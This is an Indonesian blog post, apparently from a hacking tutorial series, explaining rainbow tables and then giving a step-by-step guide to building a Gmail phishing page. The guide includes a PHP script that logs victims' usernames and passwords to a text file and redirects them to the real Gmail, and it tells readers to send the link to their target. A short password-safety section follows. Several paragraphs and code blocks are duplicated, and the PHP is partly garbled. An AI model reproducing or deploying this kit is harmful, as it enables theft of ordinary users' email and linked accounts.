Rainbow
Table
Rainbow
table adalah daftar pra-hitung
besar nilai hash untuk setiap kemungkinan kombinasi karakter. Hash password adalah password yang telah
melalui algoritma matematika yang ditransformasikan menjadi sesuatu yang
benar-benar asing. Hash adalah transformasi
aritmatik sebuah string dari karakter menjadi nilai yang merepresentasikan
string aslinya. Sebuah
algoritma hashing yang sangat umum digunakan sebagai jaminan untuk menyimpan
password di database website adalah MD5.
Katakanlah Anda mendaftar pada sebuah situs web. Anda masukkan username dan password. Sekarang ketika anda mengirimkannya, password akan berjalan melalui algoritma MD5 dan hasil hash disimpan dalam database. Sekarang karena anda tidak bisa mendapatkan password dari hash, anda mungkin bertanya-tanya bagaimana mereka tahu jika password anda tepat ketika anda login. Nah ketika Anda login dan memasukkan username serta password anda, sebuah script mengambil sandi dan berjalan melalui algoritma md5. Hasil hash dibandingkan dengan hash yang tersimpan dalam database. Jika mereka adalah sama, maka anda berhasil untuk login kea kun anda.
Jika saya harus menjalankan kata "bangsat" melalui algoritma MD5, hasilnya akan menjadi seperti ini : 528f980649c80a7269402447b51e815a. Memiliki setiap kombinasi karakter hash adalah cara alternatif yang jauh lebih baik untuk mencoba cracking brute force. Setelah Rainbow table tercipta, cracking password telah meningkat seratus kali lebih cepat dari pada brute-force. Saya akan menunjukkan contoh cracking Rainbow table ketika kita masuk ke chapter Windows password cracking di artikel lainya.
Katakanlah Anda mendaftar pada sebuah situs web. Anda masukkan username dan password. Sekarang ketika anda mengirimkannya, password akan berjalan melalui algoritma MD5 dan hasil hash disimpan dalam database. Sekarang karena anda tidak bisa mendapatkan password dari hash, anda mungkin bertanya-tanya bagaimana mereka tahu jika password anda tepat ketika anda login. Nah ketika Anda login dan memasukkan username serta password anda, sebuah script mengambil sandi dan berjalan melalui algoritma md5. Hasil hash dibandingkan dengan hash yang tersimpan dalam database. Jika mereka adalah sama, maka anda berhasil untuk login kea kun anda.
Jika saya harus menjalankan kata "bangsat" melalui algoritma MD5, hasilnya akan menjadi seperti ini : 528f980649c80a7269402447b51e815a. Memiliki setiap kombinasi karakter hash adalah cara alternatif yang jauh lebih baik untuk mencoba cracking brute force. Setelah Rainbow table tercipta, cracking password telah meningkat seratus kali lebih cepat dari pada brute-force. Saya akan menunjukkan contoh cracking Rainbow table ketika kita masuk ke chapter Windows password cracking di artikel lainya.
Phishing
Phishing adalah proses
mencuri informasi sensitif, seperti username, password, dan informasi bank, dengan
berpura-pura menjadi sesuatu yang tidak asing bagi korban. Contoh, anda menerima sebuah email dari seorang
hacker yang berpura-pura menjadi admin bank dimana anda menjadi salah satu nasabahnya. Dalam e-mail,
mungkin anda diberitahu bahwa anda harus memperbarui account anda sebelum kadaluarsa, dan kemudian hacker menyediakan
link. Setelah anda mengklik pada link, anda tiba di sebuah website yang terlihat persis seperti halaman bank yang sebenarnya. Pada
kenyataannya itu hanya replika
yang sempurna, dan ketika anda masukan rincian login anda, rincian tersebut akan mengirimkannya ke server web
replik yang anda klik tadi. Menjadi
Hacker yang bisa menciptakan tekhnik seperti ini cukup mudah, syaratnya anda harus paham di bidang HTML dan pemrograman PHP. Di
bawah ini saya akan menunjukkan contoh
sederhana beberapa langkah-langkah Hacker untuk membuat website phishing.
Dengan melihat langkah-langkah seperti ini pula dapat membantu anda mempertahankan akun anda dari serangan seorang Hacker ahli phising.
1. Pertama pilihlah target. Target yang paling
recommendate untuk serangan phishing adalah layanan email seperti Hotmail dan Gmail,
alasanya sederhana, karena kedua email ini sifatnya umum dan banyak digunakan
berbagai kalangan. Ketika berhasil masuk anda juga akan melihat dimana saja
email ini terkait. Entah dia menggunakan untuk
facebook atau bahkan Paypal kita akan mengetahuinya, sekali
memancing tiga empat lima enam ikan tertangkap.
2. Setelah memilih targetnya, pergilah ke situs web dan simpan seluruh halaman utamanya. Saya menggunakan Mozilla Firefox, (sangat merekomendasikan menggunakan browser ini untuk keamanan dan kustomisasi.) Jadi saya akan pergi ke www.gmail.com dan klik File -> Simpan Save As ..., atau cukup tekan <CTRL> + S agar tersimpan secara otomatis . Pilih mana Anda ingin menyimpan halaman web dan tekan Simpan.
3. Setelah anda simpan, ubah nama ServiceLogin.html menjadi index.html. Kenapa saya menganjurkan namanya menjadi "index" fungsinya agar ketika anda meng-upload ke web host dan seseorang
pergi ke link anda,maka halaman
indeks adalah halaman pertama
yang akan muncul.
4. Berikutnya membuat script PHP. Di bawah ini adalah script PHP sederhana yang akan menjadi log rincian login anda ketika seseorang klik "Sign in". Untuk melihat cara kerjanya, copy dan paste kode berikut ke notepad. Berikutnya simpan ke dalam direktori yang sama seperti anda menyimpan halaman Gmail tadi, dan beri nama itu phish.php. Setelah membuat halaman phish.php, buat file teks kosong baru dan beri nama list.txt.
4. Berikutnya membuat script PHP. Di bawah ini adalah script PHP sederhana yang akan menjadi log rincian login anda ketika seseorang klik "Sign in". Untuk melihat cara kerjanya, copy dan paste kode berikut ke notepad. Berikutnya simpan ke dalam direktori yang sama seperti anda menyimpan halaman Gmail tadi, dan beri nama itu phish.php. Setelah membuat halaman phish.php, buat file teks kosong baru dan beri nama list.txt.
ini menandai awal dari script PHP.
Header ("Location: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy<mpl=default<mplcache=2 "); // Setelah Anda klik "Sign in" di website palsu, ini mengarahkan Anda ke situs web Gmail nyata, membuat seluruh proses tampak lebih manis.
$handle = fopen ("list.txt", "a"); // Ini fungsinya memberitahu server untuk membuka file "list.txt" dan siap untuk menampung data. Yang dalam hal ini adalah username dan password koban.
Foreach ($ _ GET $variabel=> $ value) {
fwrite ($ handle, $ variabel);
fwrite ($ handle, "=");
fwrite ($ handle, $ value);
fwrite ($ handle, "\ r \ n");
} // Bagian ini hanya memberikan semua informasi melalui formulir ini secara variabel. Ini termasuk nama pengguna dan password korban.
Fwrite ($ handle, "\ r \ n"); // Ini menulis rincian Anda ke file "list.txt"
fclose ($ handle); // Ini hanya menutup koneksi ke file "list.txt"
out;
?> // Menandai akhir program PHP.
Header ("Location: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy<mpl=default<mplcache=2 "); // Setelah Anda klik "Sign in" di website palsu, ini mengarahkan Anda ke situs web Gmail nyata, membuat seluruh proses tampak lebih manis.
$handle = fopen ("list.txt", "a"); // Ini fungsinya memberitahu server untuk membuka file "list.txt" dan siap untuk menampung data. Yang dalam hal ini adalah username dan password koban.
Foreach ($ _ GET $variabel=> $ value) {
fwrite ($ handle, $ variabel);
fwrite ($ handle, "=");
fwrite ($ handle, $ value);
fwrite ($ handle, "\ r \ n");
} // Bagian ini hanya memberikan semua informasi melalui formulir ini secara variabel. Ini termasuk nama pengguna dan password korban.
Fwrite ($ handle, "\ r \ n"); // Ini menulis rincian Anda ke file "list.txt"
fclose ($ handle); // Ini hanya menutup koneksi ke file "list.txt"
out;
?> // Menandai akhir program PHP.
Sejauh ini anda akan melihat file berikut dalam folder anda:
5. Sekarang edit sedikit halaman Gmail utama [index] untuk menyertakan file PHP nya. Untuk mengeditnya, buka halaman Gmail
utama bernama index.html dengan notepad.
6. Tekan <CTRL> + F, atau pergi ke Edit -> Find, ketik action dan tekan "Find Next".
6. Tekan <CTRL> + F, atau pergi ke Edit -> Find, ketik action dan tekan "Find Next".
7. Ini akan
menyoroti memblok kata
pertama dari "action" dalam naskah dan anda akan melihat hal berikut:
Ada dua kata "action" di script jadi pastikan anda memiliki kata yang tepat dengan melihat "form id" nama di atas. Ubah link antara action = "" untuk phish.php. Ini akan membuat form submit ke naskah phish PHP Anda, bukan ke Google. Setelah link Anda akan melihat kode:
Ubah
kata "POST" menjadi "GET" sehingga terlihat seperti metode = "GET". Apa
yang metode GET lakukan adalah
mengirimkan informasi yang anda
di ketik korban melalui URL sehingga rincian log
nya akan masuk ke script PHP.
8. Simpan dan tutup file.
9.
Berikutnya upload file ke
hosting gratis yang mendukung PHP. Anda
bisa mencaringa di sini.
10.
Setelah semua file di-upload, anda ubah permissionsnya untuk
file "list.txt". Sort
file dan cari CHMOD. Pilih
opsi ini dan ubah izin file untuk "list.txt" ke 777. Jika Anda tidak
tahu bagaimana melakukan ini, mintalah bantuan pada orang yang menggunakan hosting sama dengan anda atau carilah penyelesainya di Google dengan
mengetik kata kunci :
"yourwebhostname chmod".
11.
Setelah semuanya dan siap, klik link hosting buatan anda untuk memastikan website anda sudah terlihat seperti halaman Gmail atau belum. Jika
sudah, coba ketik username dan password dan lalu klik Sign in. Ini akan mengarahkan anda ke halaman Gmail yang nyata.
12.
Sekarang pergilah ke cpanel
hosting anda dan lihatlah berkas
list.txt anda. Anda akan melihat rinciannya seperti
berikut ini.
Email = myusername ( email yang saya buat untuk testing )
Password = mypassword ( password yang saya ketikkan
bersama email tadi )
Seperti yang anda lihat diatas, data login yang saya
ketik walaupun asal asalan tetap tersimpan disana kan, mantab jaya.
Langkah selanjutnya kirim link phising yang baru selesai
anda buat ke sasaran anda sendiri.
Countermeasures ( Pencegahan )
Sekarang saya akan tunjukkan semua tindakan pencegahan yang harus anda ambil untuk melindungi diri dari semua Crakcing Password Attack dalam artikel Chapter#4 Password Part A+B.
Social Engineering
Untuk melindungi diri dari serangan rekayasa sosial atau bahasa jawanya Social engineering seperti ini, anda harus belajar untuk mempertanyakan maksud dari seseorang tersebut langsung ke sumber terkait. Dalam contoh yang sudah saya tuliskan di artikel sebelumnya, ada baiknya anda memiliki contact langsung ke departemen terkait yang pada contoh adalah bank, maka setidaknya anda punya nomor telpon pusat bank tersebut. Jangan asal percaya dan langsung klik ini dan itu yang bisa mengakibatkan akun anda di bobol. Sedikit repot ? menurut saya tidak.Jika untuk keamanan kenapa tidak. Lebih baik aman daripada menyesal.
Shoulder Surfing
Ketika anda mengetikkan password
anda, pastikan tidak ada satu
orangpun dibelakang anda yang mungkin mencoba
mengintip password anda. Jika ada, berbalik dan tendangan
dia atau tonjok wajahnya. Juga, pastikan anda tidak menyimpan catatan tempel atau note pencatat dimana anda menuliskan data anda terlihat di
sembarang tempat, saran saya buatlah pawwrod dengan kata yang cukup rumit tapi
mudah diingat dan mungkin tidak terpikirkan orang lain.
Guessing
Untuk mencegah serangan ini terjadi, jangan pernah menggunakan password seperti tanggal lahir Anda, nama kecil ibu anda, nama hewan peliharaan Anda, nama pasangan Anda, atau apa pun yang seseorang mungkin bisa menebak.
Dictionary attacks
Dictionary attacks sangat sederhana untuk dicegah. Jangan
gunakan password yang ada pada kamus kosakata. Beberapa
orang mungkin berpikir bahwa jika mereka menggunakan sebuah kata dari kamus
tetapi menggantikan sebagian besar huruf dengan angka, maka mereka aman. Mereka sungguh orang orang yang baik, password
seperti itu tidak bisa mengatasi Dictionary attacks. Seperti 4n1m41 untuk kata"Animal". Untuk
password yang aman, saya akan merekomendasikan menggunakan frase seperti "tanggallahikkuberapahayo?100". sedikit konyol tapi lumayan dari pada di hack.
Brute force attact
Serangan brute force dapat dicegah dengan membuat password yang sangat panjang dan menggunakan banyak angka dan karakter aneh. Semakin lama password lama waktu yang dibutuhkan untuk hacker untuk memecahkan sandi Anda. Jika setelah beberapa hari hacker belum mampu memecahkan sandi anda melalui serangan brute-force, maka sangat mungkin dia akan menyerah. Seperti saya katakan dalam Dictionary attacks, menciptakan frase sandi unik adalah pilihan terbaik anda untuk aman.
Rainbow Tables
Sama seperti cara menghindari Brute Force Attact, anda dapat menghindari Rainbow Tables Cracking hanya dengan membuat kata sandi yang sangat panjang dan teracak secara maksimal,misalnya “akucintakamupacarkuyanglahirtaun1999yangpunyaalamatemail@gmail.com” Hahahaha. Membuat tabel untuk password yang panjang membutuhkan waktu yang sangat lama dan membutuhkan banyak sumber daya. Sedikit gila yang penting aman.
Phising
Mengatsi serangan phishing sangatlah mudah. Ketika anda diminta untuk memasukkan informasi pribadi anda ke dalam sebuah situs web, lihat URL di adrees bar nya. Jika misalnya anda seharusnya berada di Gmail.com dan di bar URL itu mengatakan sesuatu yang sama sekali berbeda seperti gmail.randomsite.com, atau gamilmail.com, maka anda harus paham itu adalah palsu. Ketika Anda berada di situs Gmail nyata, URL harus dimulai dengan www.google.com dan URL nya terlihat berbeda bisa dipastikan itu adalah web Phising.
Tambahan
Pada beberapa chapter kedepan saya akan menggunakan dual os, baik windows dan linux akan saya bahas tapi tidak dalam satu tempat yang sama. Sekarang anda tahu apa saja metode cracking password, jika anda tertarik untuk belajar lebih banyak software cracking populer lainnya, anda bisa kunjungi link di bawah ini:
Happy hacking.
0 komentar:
Posting Komentar